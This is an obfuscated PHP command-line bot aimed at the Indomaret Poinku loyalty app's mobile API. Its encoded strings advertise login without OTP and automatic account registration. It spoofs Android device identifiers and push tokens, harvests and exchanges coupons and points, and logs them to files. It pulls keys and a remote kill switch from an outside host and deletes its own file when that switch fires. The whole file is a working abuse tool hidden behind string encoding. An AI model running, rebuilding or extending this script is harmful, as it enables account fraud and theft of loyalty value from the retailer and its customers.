  gHwT9:
  if (!($fUekS == '')) {
    goto cXIKR;
  }
  goto NQMsn;
  Y7JQT:
  $jTEU0;
  goto Mt1UZ;
  faEcm:
  Fh1k_:
  goto nJiyB;
  QT4Zl:
  $XTuz1 = g1Wxt("\150\x74\164\160\163\72\x2f\57\145\x64\164\163\x61\x70\160\x2e\151\156\144\157\155\141\x72\x65\x74\x70\157\x69\156\x6b\165\56\143\x6f\155\57\143\x75\163\164\157\155\145\x72\57\141\x70\x69\170\55\61\x35\60\x32\x2d\141\x70\x69\x2f\x6d\157\x62\x69\154\145\x2f\x63\x75\x73\164\x6f\x6d\x65\162\x2d\141\144\x64\x72\x65\x73\163\57\x70\x6f\x73\x74\141\x6c\x2d\x63\x6f\x64\x65", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto oEbC2;
  fdNlj:
  $WtCiL = @$Ap1KM["\x64\x61\164\141"]["\143\157\165\x70\157\156\x43\x6f\144\x65"];
  goto xMsml;
  l7_E_:
  echo "\12";
  goto YFMSc;
  Pjpiq:
  echo @zM6IC("\171\x65\x6c\154\157\167", "\40\65\40\x20\56\x20\x54\165\153\141\162\x20\x50\157\151\156\xa");
  goto oH2Jv;
  hD5a6:
  $jTEU0 = trim(fgets(STDIN));
  goto gECUy;
  tJomU:
  $owfHy = json_decode($upOL9, true);
  goto fOkfz;
  I58TZ:
  se_Kh:
  goto EpWcu;
  FuYJt:
  $aY0el = $v1ZMX;
  goto T8ERT;
  FOVdB:
  $nb9cm = round(microtime(true) * 1000);
  goto GiiQv;
  ayiza:
  $Bz8Et = @$owfHy["\x64\x61\164\141"][0]["\x70\157\163\164\x61\154\x43\157\144\x65"]["\160\x6f\x73\x74\141\x6c\103\157\x64\x65"];
  goto rV1X4;
  KsSFo:
  if (!($zcN5u == '')) {
    goto lUvmA;
  }
  goto pjVQI;
  ZVQhU:
  $m5BZY = Gggr_("\150\x74\x74\x70\163\x3a\x2f\x2f\x61\163\x69\x61\55\163\x6f\165\x74\150\145\141\x73\164\62\55\x69\144\x6d\x2d\x63\157\162\160\55\160\162\144\x2e\x63\154\x6f\165\144\146\x75\x6e\x63\x74\x69\x6f\156\163\56\156\x65\x74\57\151\144\155\141\160\160\x73\137\164\x72\x61\143\153\145\x72\x5f\x67\x61\x74\x65\x77\x61\x79", $wDisp);
  goto HH90U;
  M4ZDE:
  echo @zM6iC("\147\x72\x65\x65\x6e", "\101\144\x61\40\101\x79\141\x6d\x2e\x2e\x2e\40\131\165\153\x20\120\x65\x63\141\x68\x69\156\40\x21\x21");
  goto N6E3V;
  MwsHo:
  $wDisp = "\x7b\x22\x6b\x65\171\167\x6f\x72\144\x22\72\x22" . $ip0vw . "\x22\175";
  goto Ip1aE;
  N0fHh:
  $wDisp = "\x7b\42\144\x61\x74\141\42\x3a\133\x7b\42\x61\160\x70\x6c\151\x63\141\x74\x69\x6f\156\42\x3a\173\x22\x61\160\160\x5f\x76\x65\x72\163\151\157\156\x22\x3a\x22\x33\56\61\63\x2e\x30\42\x2c\42\x64\x65\x76\151\143\145\137\x63\154\x61\x73\163\x22\72\42\x50\150\157\156\x65\x22\x2c\42\144\x65\166\x69\143\145\137\x66\x61\x6d\x69\x6c\x79\x22\x3a\x22" . $GOXkU . "\x22\54\42\x64\145\x76\151\143\145\x5f\151\144\42\72\x22" . $aY0el . "\42\x2c\x22\x6f\x73\137\156\x61\155\145\x22\x3a\42\x41\x6e\x64\162\x6f\x69\144\x20\120\42\54\42\157\163\x5f\x76\x65\162\163\151\x6f\156\x22\x3a\x22\101\156\144\x72\x6f\151\144\x20\x39\x22\175\54\42\143\157\162\x65\x22\72\x7b\x22\145\x76\x65\x6e\x74\x5f\156\x61\155\x65\x22\72\x22\x63\x6c\151\x63\153\x5f\x6c\151\156\153\42\54\x22\x65\x76\x65\x6e\x74\137\164\x69\155\145\x73\164\141\155\160\x22\72" . $nb9cm . "\54\42\x6c\151\x6e\x6b\137\x6c\141\x62\145\x6c\x22\72\x22\123\x65\154\145\x73\141\x69\42\175\x2c\x22\165\163\145\x72\42\x3a\173\42\x73\145\x73\x73\x69\x6f\156\137\151\x64\42\72\42" . $MXjqh . "\42\54\x22\165\163\145\x72\137\x69\x64\42\72" . $R_bYC . "\54\x22\x75\x73\145\162\x5f\x69\160\x5f\141\144\144\162\145\163\163\x22\x3a\42\x31\x32\x37\56\x30\x2e\x30\56\x31\x22\175\175\x5d\x7d";
  goto s0too;
  xWUEy:
  e81aM:
  goto dEYI8;
  p4P9K:
  die;
  goto op03J;
  vAFZI:
  $v1ZMX = str_replace("\xd", '', $wPFxB);
  goto I_qlq;
  wCzt2:
  echo "\12";
  goto n68gs;
  jgBkc:
  XfMNS:
  goto UvoZT;
  uujgh:
  $Jk9cx = e6TPN("\150\164\x74\160\163\72\57\57\x66\151\162\x65\x62\x61\x73\145\x2d\x73\145\x74\164\x69\x6e\x67\x73\x2e\143\x72\141\163\150\x6c\x79\x74\151\143\163\56\143\157\x6d\x2f\163\160\x69\x2f\x76\x32\57\160\x6c\141\164\x66\157\x72\x6d\163\x2f\141\156\x64\162\157\151\144\57\147\x6d\160\x2f\x31\72\71\x39\x38\70\x31\66\66\60\65\63\62\70\x3a\141\x6e\144\x72\x6f\x69\144\x3a" . $aY0el . "\57\x73\x65\164\164\x69\x6e\147\x73\77\x69\x6e\163\x74\141\156\x63\145\x3d\141\62\71\x31\x63\x62\145\70\x30\x38\x66\x36\x36\66\66\x38\x33\141\143\x31\66\x37\145\141\x35\70\63\x39\x33\143\67\x30\71\65\62\70\x65\64\x66\x36\46\142\x75\151\154\144\x5f\166\145\x72\x73\151\x6f\x6e\75\x31\60\64\x26\144\x69\163\160\x6c\x61\171\x5f\166\x65\x72\x73\151\x6f\x6e\75\x33\x2e\61\63\56\60\x26\x73\157\x75\162\x63\x65\x3d\x34", $aY0el);
  goto mPz3m;
  sw1Yf:
  $Ap1KM = json_decode($xT15V, true);
  goto cw7l6;
  J5SJE:
  $Qa1_P = @$owfHy["\x64\141\x74\x61"]["\x63\157\x6e\164\x65\x6e\x74"][$dQ8Tp]["\x63\x6f\x75\160\x6f\156\x49\144"];
  goto kiloP;
  MyAZJ:
  $U0YgX = str_replace("\15", '', $zcN5u);
  goto QM3hr;
  zlfMJ:
  if ($ZNU2M == '') {
    goto IiPZc;
  }
  goto jRg_C;
  ZzJEY:
  echo "\12";
  goto tHryq;
  RgM1e:
  echo @ZM6IC("\156\145\x76\x79", "\133\x31\64\x5d\x20{$S02nx}\40\xa\x20\40\40\x20\76\x20{$Q8u1Y}\40\12\12");
  goto x8Bj2;
  NEtRK:
  function rlM6E($FK_yc, $bQedf, $zn5zd)
  {
    goto WAITr;
    h1wA8:
    fputs($FhLCi, "{$zn5zd}\x20\174\x20{$bQedf}\12");
    goto Io9Zc;
    WAITr:
    $FhLCi = fopen($FK_yc, "\x61");
    goto h1wA8;
    Io9Zc:
    fclose($FhLCi);
    goto nSdqB;
    nSdqB:
  }
  goto SrD9A;
  AEHyE:
  echo "\12";
  goto TZYFr;
  M10jD:
  $QRhbE = explode("\12", @file_get_contents("\x66\157\x72\x63\145\x63\154\x6f\x73\145"));
  goto ifSLw;
  JPlU1:
  $earOL = $sONlZ;
  goto W0caM;
  wlYZy:
  $m0f8X = explode("\xa", @file_get_contents("\x6d\171\x74\157\x6b\145\x6e"));
  goto b6FwC;
  PSf1q:
  $cQFRW = json_decode($ofEkP, true);
  goto gScoP;
  uMLhp:
  echo @ZM6ic("\156\x65\x76\x79", "\x20\174\x20\123\x63\x72\151\160\164\x20\x49\104\115\40\114\x4f\107\x49\116\40\120\117\x49\x4e\113\125\40\124\101\116\x50\x41\40\x4f\x54\120\12");
  goto IuO51;
  rV1X4:
  $pugmZ = @$owfHy["\x64\x61\164\x61"][0]["\x70\157\x73\x74\x61\x6c\103\x6f\144\145"]["\160\x6f\x73\x74\x61\154\x43\x6f\x64\145\111\x64"];
  goto RdjY_;
  tXal_:
  $jTEU0 = trim(fgets(STDIN));
  goto EUIiI;
  e08Bo:
  echo "\12";
  goto QlV8Y;
  UlQV_:
  echo @zM6iC("\x6e\x65\x76\171", $YXsOG);
  goto eqyZ2;
  rY3kD:
  $t2tnx = @$owfHy["\x64\x61\164\141"][0]["\162\x65\143\x69\x70\x69\x65\156\164\120\x68\157\156\145\116\165\155\x62\145\x72"];
  goto wTOTz;
  uNQ8P:
  $mYT0v["\164\x65\x78\164"] = $YXsOG;
  goto VrZaE;
  k0I3d:
  $wDisp = "\173\42\x63\165\163\164\x6f\x6d\x65\x72\x47\141\x6d\145\111\144\42\x3a\x22" . $ypyz5 . "\42\175";
  goto Ys25d;
  Uj8_1:
  KIJlA:
  goto d3fM_;
  nTwzh:
  echo "\12";
  goto Aj6dX;
  qgKwQ:
  echo "\xa";
  goto x3rSv;
  vEGl4:
  $WtCiL = @$Ap1KM["\x64\141\164\x61"]["\x63\157\165\x70\157\x6e\103\x6f\144\145"];
  goto Cfvqe;
  M6fNa:
  echo @zM6Ic("\147\162\145\x65\156", "\116\x6f\x6d\157\162\x20\110\x50\x20\x41\x6e\x64\x61\x20\x20\x3a\40");
  goto bOrHs;
  ozeA_:
  $yeprB = g1wxt("\150\x74\164\160\x73\72\57\57\x65\x64\x74\163\141\x70\x70\56\151\156\144\157\155\x61\162\145\x74\160\x6f\151\156\x6b\165\56\x63\157\x6d\57\x6e\x6f\x74\151\x66\151\143\x61\x74\151\x6f\x6e\x2f\x61\x70\151\170\55\61\x35\x30\x32\x2d\141\160\151\x2f\x70\165\x73\150\x2d\156\157\164\x69\146\x69\x63\x61\x74\151\157\156\163\57\x66\x63\x6d\55\x72\145\x67\151\163\x74\162\x61\164\x69\x6f\x6e", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto oopdK;
  U1R2H:
  $jTEU0++;
  goto gUQAz;
  W0caM:
  $w5ulg = str_replace("\15", '', $TvVlh);
  goto P08e3;
  rIaU9:
  if (!($fUekS == '')) {
    goto gp62g;
  }
  goto wRkJh;
  riEyv:
  $Y_a4j = trim(file_get_contents("https://irfan.iproute.my.id/ipoinx/medansi/poinkey"));
  goto X0B6J;
  zFn3e:
  $IBJ55 = trim(file_get_contents("https://irfan.iproute.my.id/ipoinx/medansi/poinnew"));
  goto NBKuI;
  NOg5t:
  e1oJO:
  goto gGSXs;
  Eko9L:
  if (!($cPDPt == 10)) {
    goto XfMNS;
  }
  goto gFeB4;
  xxJd7:
  RHrij("\x4b\x75\160\x6f\156\40\x50\157\151\x6e\x6b\x75\x20\x6e\x65\x77\56\x74\x78\164", $GTMYQ);
  goto kvyId;
  IuO51:
  echo @zM6Ic("\171\145\x6c\x6c\157\x77", "\x42\x75\x69\154\144\40\x42\171\40\x46\105\x52\104\x59\x20\122\x41\x4d\x41\104\x48\x41\116\40");
  goto jm8QN;
  KCcRM:
  JgrhB:
  goto cCvz0;
  UuPZd:
  $wZnHP = $lPULW[$jTEU0];
  goto kGfGw;
  GdJUg:
  echo @ZM6IC("\x6e\145\166\x79", $t2tnx);
  goto hp69C;
  twQoz:
  echo @ZM6ic("\x79\145\154\x6c\x6f\167", "\113\157\x64\145\40\x4b\165\x70\x6f\156\156\171\x61\40\40\x20\x20\x3a\40");
  goto JtIVc;
  k7huS:
  goto MLXaN;
  goto padaL;
  PuPZU:
  $aoIfK = @file_get_contents("\155\157\162\x65");
  goto JBjpK;
  hMWAZ:
  $YE0oY = g1WxT("\x68\164\x74\160\x73\x3a\57\57\x65\x64\164\163\x61\x70\x70\x2e\151\156\144\157\155\141\162\145\x74\x70\157\151\156\x6b\165\x2e\x63\x6f\155\x2f\x6c\x6f\x67\x69\x6e\57\141\x70\151\x78\55\x31\65\x30\x32\x2d\x61\x70\x69\x2f\x6f\160\145\156\x2f\160\x69\x6e\x2f\143\x68\145\143\x6b\x2d\144\145\166\x69\x63\x65", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto J9oHK;
  Cfvqe:
  $LgiFv = @$Ap1KM["\144\x61\164\141"]["\x69\156\146\157\162\155\141\164\151\157\156"];
  goto XDKb2;
  LCYe1:
  echo "\x4d\165\154\141\151\40\102\141\x72\151\x73\40\x4b\145\40\x20\72\x20";
  goto gmo6i;
  TSJ4g:
  goto j7pkX;
  goto cYcM8;
  MIRP3:
  echo @zm6IC("\x6e\x65\166\x79", "\101\153\x75\x6e\40\113\145\x20\x20\x20\x20\x20\x20\40\40\72\x20");
  goto m5ULx;
  wstM7:
  echo @ZM6ic("\156\x65\x76\171", $ldzeo);
  goto JATu9;
  wHuxC:
  die;
  goto BOv0N;
  xgNd2:
  $w5ulg = str_replace("\xd", '', $TvVlh);
  goto iv9jW;
  zAu8b:
  echo @Zm6iC("\x67\x72\145\145\x6e", "\120\157\x73\164\x61\154\40\x43\157\x64\145\40\40\40\x20\x3a\40");
  goto DJjdR;
  jqBDn:
  echo @ZM6iC("\x6e\145\166\171", $pugmZ);
  goto Oe2Q8;
  gsqDa:
  $a7K8a = JLw7P("\150\164\164\x70\x73\72\x2f\57\146\151\x72\145\x62\x61\x73\x65\x69\156\x73\x74\x61\154\x6c\x61\x74\151\x6f\156\x73\x2e\x67\157\157\x67\154\145\141\160\x69\163\56\x63\157\x6d\57\166\61\57\160\162\x6f\152\x65\x63\x74\x73\x2f\x69\x64\x6d\55\x63\157\x72\160\55\x70\x72\x64\57\151\x6e\163\164\141\x6c\154\x61\164\151\157\156\x73", $wDisp);
  goto tyzFG;
  OaVT1:
  $PQA77 = $OtngW;
  goto ejx25;
  YVULM:
  $z4sxX = @$lImQC["\x64\141\x74\141"]["\143\157\x6e\164\x65\x6e\164"][7]["\x63\157\165\x70\x6f\156\x4e\x61\155\x65"];
  goto lCoM2;
  tmuK2:
  $ZNU2M = @$Ap1KM["\x64\x61\x74\141"]["\x63\x6f\165\160\157\156\116\141\155\145"];
  goto fdNlj;
  HTPsC:
  p1VdQ:
  goto xfpgA;
  BqavN:
  vFJdm:
  goto cgMr9;
  eXFTh:
  $XDyMm = G8pF2("\x68\x74\x74\160\163\72\57\57\145\144\x74\163\x61\x70\160\56\151\x6e\144\157\x6d\141\x72\x65\164\x70\x6f\x69\x6e\x6b\x75\56\143\157\155\57\x63\x6f\x75\160\x6f\x6e\57\x61\160\x69\x78\x2d\61\65\60\62\55\x61\x70\x69\x2f\x6d\157\142\151\154\145\x2f\x63\x6f\x75\x70\157\156\x73\57\x68\141\x73\55\156\145\x77\x2d\x63\157\165\x70\157\156", $aY0el, $GOXkU, $mlMLt);
  goto IgHJm;
  f4TNt:
  $ABmxY = @$owfHy["\x6d\145\163\163\141\x67\x65"];
  goto mTnnn;
  kAmOU:
  $wdxee = @$owfHy["\144\141\x74\141"]["\x63\157\156\x74\145\156\164"][$dQ8Tp]["\145\170\x63\x68\x61\x6e\x67\x65\x53\164\141\162\164\104\x61\164\145"];
  goto x31ij;
  UPPZ2:
  echo "\xa";
  goto HjmuJ;
  E1znw:
  echo @ZM6Ic("\x72\x65\144", "\x59\141\x68\x2e\x2e\56\x20\101\171\x61\x6d\x20\116\x79\x61\x20\107\x61\40\101\x64\x61\x20\54\x20\x43\x65\153\40\113\x65\155\x62\141\x6c\151\x20\x4e\141\156\x74\x69\x2e\x2e\x2e");
  goto KBFjt;
  ja9Xm:
  @unlink("\x70\157\151\x6e\x68\160\56\160\x68\x70");
  goto K23sE;
  YISeP:
  $aY0el = $v1ZMX;
  goto gakRU;
  OA4m1:
  BuRXH:
  goto dgajK;
  Rfnnj:
  $UHj7C = G8PF2("\150\164\164\x70\163\x3a\57\57\145\144\x74\163\x61\160\x70\x2e\151\x6e\x64\x6f\x6d\141\162\x65\164\160\157\x69\x6e\153\x75\56\143\157\155\x2f\x63\157\165\160\x6f\156\57\x61\160\x69\170\x2d\61\65\60\x32\x2d\x61\160\x69\x2f\155\157\x62\151\154\145\57\x63\157\165\160\x6f\x6e\163\x3f\x75\156\x70\x61\147\145\x64\75\x74\162\x75\145", $aY0el, $GOXkU, $mlMLt);
  goto FOVdB;
  E67WH:
  WCMhM:
  goto MR7en;
  UfDTf:
  echo @ZM6IC("\x6e\145\x76\171", "\40\x20\40\40\40\x20\x20\x20\40\x20\40\40\x20\x20\40\40\x41\101\x4d\x49\111\x4e\x20");
  goto TAwyA;
  oeQpn:
  @unlink("\x70\157\151\156\150\x70\56\x70\x68\x70");
  goto P07mA;
  tw645:
  cEejp:
  goto A1QGS;
  hwdtM:
  echo "\12";
  goto IpDdv;
  H8iZh:
  goto lPFhp;
  goto HCWyL;
  kJKzo:
  echo "\12";
  goto lkfTM;
  Od3xN:
  $ogbF4 = "\61\x30\x30\60\60\60\60\x30";
  goto xuF8a;
  oH2Jv:
  echo @ZM6iC("\171\x65\x6c\x6c\x6f\167", "\40\66\40\x20\56\40\122\x65\147\151\x73\164\x20\120\x6f\x69\156\x6b\x75\40\117\164\157\x6d\141\164\x69\x73\12");
  goto yB2Vl;
  wWuTM:
  echo "\12";
  goto gZGkC;
  GgFfz:
  $wDisp = "\x7b\42\160\x68\x6f\x6e\x65\116\x75\155\x62\145\x72\x22\x3a\x22" . $zn5zd . "\42\x2c\42\x6f\164\x70\42\x3a\x22" . $hdCXp . "\x22\54\42\x64\x65\166\151\x63\x65\111\144\42\x3a\x22" . $aY0el . "\42\x7d";
  goto iBHNa;
  evno_:
  $zy8D_ = curl_exec($C6npe);
  goto ZiXgl;
  o1wNp:
  $eqo_P = @file_get_contents("\x77\x68\x6f\x61\155\x69");
  goto TJT6Y;
  Rew81:
  r9C2_:
  goto tmzrq;
  mfo7m:
  $yy9BI++;
  goto EoL_9;
  bQaVk:
  echo @zm6IC("\x72\145\x64", $D2zwh);
  goto P7yvx;
  dXHQv:
  $zcN5u = xOZB4(array("\174"), $tqWr2)[0];
  goto APlFW;
  caGhK:
  echo "\xa";
  goto QFkzP;
  Y_om6:
  if (!($rVPVc == '')) {
    goto xbrV2;
  }
  goto nw32r;
  YhnL7:
  echo "\12";
  goto zX3Pb;
  ZAvo0:
  $JrTpE = @$owfHy["\144\x61\164\x61"][0]["\x64\151\x73\x74\x72\x69\x63\x74"]["\143\x69\x74\x79"];
  goto Vy0Lw;
  bfEta:
  @unlink("\x70\157\x69\x6e\150\x70\x2e\x70\x68\x70");
  goto MfNSg;
  bY0qY:
  die;
  goto LOrcr;
  yJoIl:
  echo "\xa";
  goto WjCv6;
  eMmIj:
  $ldzeo = @$owfHy["\144\x61\x74\x61"][$qtgR3]["\x73\165\142\104\151\x73\164\162\x69\143\164"];
  goto p12qk;
  tHryq:
  echo @zM6Ic("\x79\145\154\154\157\x77", "\x4e\x61\155\x61\40\x4b\165\160\x6f\x6e\156\x79\141\x20\40\40\x20\x3a\x20");
  goto JgUFe;
  EtUWZ:
  goto hJDqH;
  goto DaBwG;
  v1iyI:
  goto Gq2T9;
  goto T8xTD;
  RnlCl:
  $Ap1KM = json_decode($N0XGD, true);
  goto o0dYP;
  adaDT:
  echo "\12";
  goto XAUCG;
  IrsDs:
  $GOXkU = "\x58\151\141\157\155\x69\40\122\x65\144\155\151\x20\x35\40\120\x6c\x75\163";
  goto IxSOI;
  N1Fy0:
  $gIJCo = xuUln($PGTBJ);
  goto vCHP8;
  XuYvJ:
  goto GGXBW;
  goto hijh7;
  dEqiK:
  CtCqn:
  goto QjFYm;
  TT_2Q:
  $odGGi = $kCT0W . "\x6d\x62\114\x51\160\145";
  goto XALsS;
  naE5z:
  echo @zM6ic("\x72\145\x64", "\xa\x7e\176\x7e\176\x7e\176\176\x7e\x7e\x7e\176\176\176\176\x7e\x7e\176\176\x7e\176\176\x7e\x7e\176\x7e\x7e\x7e\x7e\x7e\176\176\176\x7e\x7e\176\176\x7e\x7e\176\176\x7e\x7e\x7e\x7e\x7e\176\176\x7e\xa");
  goto s74NK;
  cs8L7:
  $k1y0B = G1wXT("\150\164\x74\x70\x73\x3a\57\57\x65\x64\x74\x73\141\160\x70\x2e\151\156\144\x6f\155\x61\162\145\x74\160\157\x69\156\153\x75\56\x63\x6f\x6d\x2f\x63\165\x73\x74\157\155\x65\162\57\141\x70\x69\170\55\61\x35\60\x32\55\141\160\151\x2f\x72\x65\x6d\157\x76\145\55\151\163\x61\153\165\x2d\164\157\x6b\145\156", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto Qb11N;
  XJjoI:
  echo shell_exec("\170\x64\147\55\157\x70\x65\x6e\40\42\x68\x74\x74\160\163\72\57\57\142\x61\162\x63\x6f\x64\x65\x2e\164\145\143\x2d\151\164\x2e\x63\157\x6d\57\x62\x61\x72\143\x6f\144\x65\x2e\x61\163\150\x78\77\144\x61\x74\x61\x3d\42" . $zn5zd . "\42\46\x63\x6f\x64\145\75\103\x6f\x64\x65\61\62\70\46\155\x75\x6c\x74\151\x70\x6c\145\x62\141\162\x63\157\144\145\x73\75\146\141\154\163\145\46\164\162\x61\156\x73\x6c\x61\x74\145\x2d\145\x73\x63\x3d\164\x72\x75\145\x26\165\x6e\x69\x74\x3d\x46\x69\164\46\x64\x70\x69\75\71\66\x26\x69\x6d\141\147\145\164\x79\160\x65\x3d\107\x69\146\x26\x72\x6f\x74\141\164\x69\x6f\x6e\x3d\60\x26\x63\x6f\x6c\x6f\162\x3d\45\x32\x33\x30\x30\60\x30\60\x30\46\142\147\143\157\x6c\x6f\x72\75\45\62\x33\146\x66\146\x66\146\x66\x26\x63\157\144\x65\160\141\147\145\75\104\145\146\x61\165\x6c\164\x26\161\165\x6e\x69\164\x3d\115\x6d\46\x71\x75\151\145\x74\75\x31\x30\46\x68\x69\x64\x65\150\162\x74\x3d\x46\141\x6c\163\145\42");
  goto msggy;
  O32m7:
  echo @ZM6iC("\156\x65\166\171", "\x53\157\x72\162\x79\x2c\40\124\x68\x69\x73\40\123\143\162\x69\160\164\40\x48\141\x73\40\x42\x65\x65\x6e\40\x52\145\155\x6f\x76\145\144\40\102\171\x20\124\150\x65\x20\117\x77\156\x65\x72\41\x21");
  goto ktRki;
  La4zp:
  echo @Zm6IC("\156\145\x76\171", "\x53\157\162\162\171\54\x20\124\x68\x69\163\x20\x53\x63\x72\x69\160\x74\x20\110\x61\x73\40\102\145\145\156\40\x52\x65\x6d\157\x76\145\144\40\102\x79\40\124\x68\145\x20\117\167\156\145\x72\x21\x21");
  goto NN42U;
  wea5J:
  if (!($cPDPt == 14)) {
    goto CtCqn;
  }
  goto uiAfq;
  wfRVl:
  vd_Oz:
  goto YfMdd;
  Wh127:
  $p4iky = @$Ap1KM["\144\x61\164\x61"]["\155\145\x6d\142\145\162\111\x64"];
  goto T3KRP;
  a2iK3:
  $Y02JS = g1wxT("\150\x74\x74\160\x73\x3a\57\57\x65\x64\x74\x73\x61\160\160\x2e\x69\156\144\157\155\x61\162\145\x74\160\x6f\x69\x6e\153\165\x2e\x63\x6f\x6d\x2f\x6c\157\x67\x69\x6e\x2f\141\160\x69\x78\x2d\61\x35\x30\x32\55\x61\x70\151\x2f\x70\151\x6e\57\143\162\x65\x61\164\145\x2d\x70\151\156", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto UWuvP;
  iBHNa:
  $o0WQD = tHHFs("\150\x74\x74\x70\x73\72\x2f\57\145\x64\x74\x73\x61\160\x70\x2e\151\x6e\144\157\155\x61\x72\x65\x74\x70\157\x69\156\153\165\x2e\x63\157\x6d\x2f\x6c\x6f\147\x69\156\x2f\x61\160\x69\170\x2d\x31\65\60\62\55\141\x70\151\x2f\157\160\x65\156\57\x6c\157\x67\x69\156\55\x76\145\x72\151\146\151\143\x61\164\151\x6f\156\x2d\x73\155\x73", $wDisp, $aY0el, $GOXkU);
  goto uC_Nz;
  er8dK:
  GsrX0:
  goto cDMKA;
  CmfSI:
  $wd9cN = date("\144\x2d\155\x2d\131\x20\x7c\x20\x48\x3a\x69\x3a\163");
  goto dVtXf;
  U90Ts:
  $N0XGD = G8pF2("\150\164\164\x70\x73\x3a\57\57\145\144\164\x73\141\160\x70\x2e\151\156\x64\157\x6d\x61\162\x65\x74\160\157\151\156\x6b\x75\56\143\157\x6d\x2f\154\x6f\171\x61\154\164\x79\57\x61\x70\x69\x78\x2d\x31\x35\x30\x32\55\x61\x70\x69\57\155\157\142\151\154\x65\x2f\x70\x6f\x69\156\164\x73\57\x6d\x65", $aY0el, $GOXkU, $mlMLt);
  goto UVPhM;
  uBAdz:
  $wDisp = '';
  goto Q2XZ7;
  w3RTq:
  goto OQhff;
  goto El078;
  utKOm:
  OfySH:
  goto wboPA;
  D1bz3:
  $wZnHP = $lPULW[$jTEU0];
  goto u7PIe;
  TvoFq:
  echo "\xa";
  goto XH7hS;
  Wbb1K:
  $KOeAA = @$Ap1KM["\x64\x61\164\141"]["\x72\x65\167\x61\x72\144\x73"][0]["\x69\x74\145\155"][0]["\x63\157\x75\160\x6f\x6e\115\141\x73\x74\145\x72\x49\144"];
  goto POBf_;
  lU4d2:
  $DxrJr = "\x31\x30\x30\x30\x30\60\x30\x30\60\60\60\60\60\x30\60\x30\60\x30";
  goto wWIIC;
  N2c3X:
  $PQA77 = $OtngW;
  goto arWms;
  R1iG3:
  aL7ye("\x77\x68\157\141\x6d\x69", $qaGLY);
  goto g06r9;
  Vy9X8:
  K8wp5:
  goto eQs6x;
  FYzej:
  $owfHy = json_decode($XTuz1, true);
  goto SRJRA;
  smjuE:
  $GOXkU = $w5ulg;
  goto Phh63;
  XzOoE:
  echo "\xa";
  goto FOA_7;
  TpXcJ:
  echo @zM6Ic("\156\145\x76\x79", "\40\x53\105\x4d\x4f\107\101\x20\114\117\102\101\116\107\x20\120\x41\x4e\124\x41\x54\40\116\x59\x41\x20\102\111\123\125\x4c\x41\116\41\41\x21\41\41\x20\12");
  goto mTXKJ;
  ZyY5B:
  echo "\12";
  goto kaBU8;
  sx31h:
  $ZdrCv = rand(10, 99);
  goto s7q36;
  BdILS:
  $U0YgX = str_replace("\xd", '', $zcN5u);
  goto o4gad;
  VpqjY:
  $Ap1KM = json_decode($Jk9cx, true);
  goto ejeA7;
  uZqPO:
  $wDisp = "\x7b\42\x75\x73\145\162\111\x64\42\72" . $R_bYC . "\x2c\42\x64\x65\x76\x69\143\x65\x54\x79\160\145\x22\x3a\x22\60\61\42\54\42\x64\145\x76\x69\x63\145\111\x64\x22\72\42" . $aY0el . "\42\x2c\x22\x66\143\x6d\x54\157\x6b\x65\156\42\72\x22" . $WYrgv . "\x3a\101\120\101\71\61\142\x46\x74\71\x57\x75\x4f\144\156\x59\x69\x74\x5f\150\117\166\x71\155\x48\x43\x32\x75\115\107\151\x69\x43\167\x70\137\165\x38\112\x67\117\x30\x6b\x42\63\x73\x67\131\121\116\170\x6f\x57\x71\117\65\x37\105\x45\x59\x70\101\x41\101\x56\152\152\104\x43\x59\x38\103\64\152\55\x65\120\x48\x43\131\107\x36\x4d\147\x63\147\x38\x35\x52\x65\x68\x4e\117\x33\63\170\x74\x31\x52\122\120\66\104\x49\x50\126\165\x33\x36\x71\x6b\x46\x48\x64\x6b\146\121\x39\x47\145\124\104\x48\x38\x57\106\162\x53\x61\151\x69\102\x7a\153\x65\x5a\107\155\x39\167\160\42\x7d";
  goto Dy0BU;
  JCfF7:
  function rhrIJ($FK_yc, $bQedf)
  {
    goto qRnqQ;
    qRnqQ:
    $FhLCi = fopen($FK_yc, "\141");
    goto gn4_b;
    xjruV:
    fclose($FhLCi);
    goto h9Bfx;
    gn4_b:
    fputs($FhLCi, "{$bQedf}\12");
    goto xjruV;
    h9Bfx:
  }
  goto bnBRa;
  H1hXk:
  pj0Fz:
  goto rTj5S;
  EyI4f:
  if ($ZNU2M == '') {
    goto k0XKX;
  }
  goto OG_cq;
  IVMnN:
  echo "\xa";
  goto K3Pk1;
  jQcSk:
  $b2ucB = @$owfHy["\x64\141\164\x61"][0]["\x64\151\x73\x74\162\x69\143\x74"]["\143\151\164\171\x4e\x61\155\x65"];
  goto Viphl;
  FMSSY:
  $v1ZMX = str_replace("\xd", '', $wPFxB);
  goto QNKX2;
  pjVQI:
  goto BGNon;
  goto rrrlO;
  X8Xws:
  echo "\12";
  goto B0rL2;
  tsqUz:
  $sONlZ = str_replace("\15", '', $rERzL);
  goto mA_cS;
  yz1R8:
  $mF_0D = @$lImQC["\x64\x61\x74\x61"]["\x63\157\x6e\x74\145\x6e\x74"][10]["\x63\157\x75\x70\157\x6e\116\141\x6d\145"];
  goto cjkQZ;
  YRlTm:
  $ofEkP = zFEbK("\x68\164\x74\160\163\72\57\57\x65\144\x74\163\x61\x70\x70\x2e\x69\156\x64\157\x6d\141\x72\145\x74\x70\x6f\x69\156\153\165\56\143\x6f\x6d\x2f\154\x6f\x79\x61\154\x74\171\57\141\160\151\170\x2d\61\x35\x30\x32\x2d\x61\x70\151\57\155\157\142\x69\x6c\145\x2f\160\157\151\156\164\163\57\x6d\x65\57\160\162\157\x74\x65\143\164\x69\157\156\x73\57\x65\x6e\x61\x62\154\x65", $wDisp, $aY0el, $GOXkU, $mlMLt);
  goto Z8K7v;
  qmoFr:
  $zn5zd = $U0YgX;
  goto vAFZI;
  kQVj5:
  $Jk9cx = g8PF2("\x68\164\x74\x70\x73\72\57\57\145\x64\164\x73\x61\160\x70\x2e\151\156\x64\157\x6d\141\162\145\x74\x70\x6f\151\x6e\x6b\x75\x2e\x63\x6f\x6d\57\x63\x6f\156\x66\x69\x67\165\x72\x61\164\x69\157\156\x2f\x61\160\x69\x78\55\61\65\x30\62\x2d\141\160\x69\x2f\155\157\x62\151\x6c\x65\x2f\x73\x79\55\x61\x70\160\x2d\x76\x65\162\163\151\157\x6e\x2f\147\x65\164\x2d\166\x65\x72\x73\x69\157\x6e\x2d\x6b\x65\x79\57\101\116\x44\122\117\111\104", $aY0el, $GOXkU, $mlMLt);
  goto AvLYy;
